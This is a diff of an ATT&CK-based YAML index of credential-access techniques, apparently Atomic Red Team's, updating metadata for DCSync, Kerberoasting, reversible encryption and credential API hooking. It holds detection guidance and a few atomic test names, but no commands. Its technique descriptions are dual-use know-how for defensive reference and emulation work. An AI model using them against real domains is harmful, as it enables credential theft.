-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -97153,6 +97860,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -97167,52 +97875,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -97234,6 +97932,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -97244,23 +97943,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -97331,9 +98057,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -97392,7 +98117,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests:
     - name: Create Volume Shadow Copy with vssadmin
@@ -97691,7 +98415,7 @@ credential-access:
         elevation_required: true
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -97723,6 +98447,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -97732,7 +98457,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -97744,43 +98468,44 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests:
     - name: Request for service tickets
@@ -97985,70 +98710,7 @@ credential-access:
         name: powershell
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -98059,21 +98721,83 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests:
     - name: DCSync (Active Directory)
@@ -98153,7 +98877,7 @@ credential-access:
         elevation_required: false
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -98166,6 +98890,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -98202,17 +98927,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -98258,81 +98983,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -98345,23 +98999,89 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
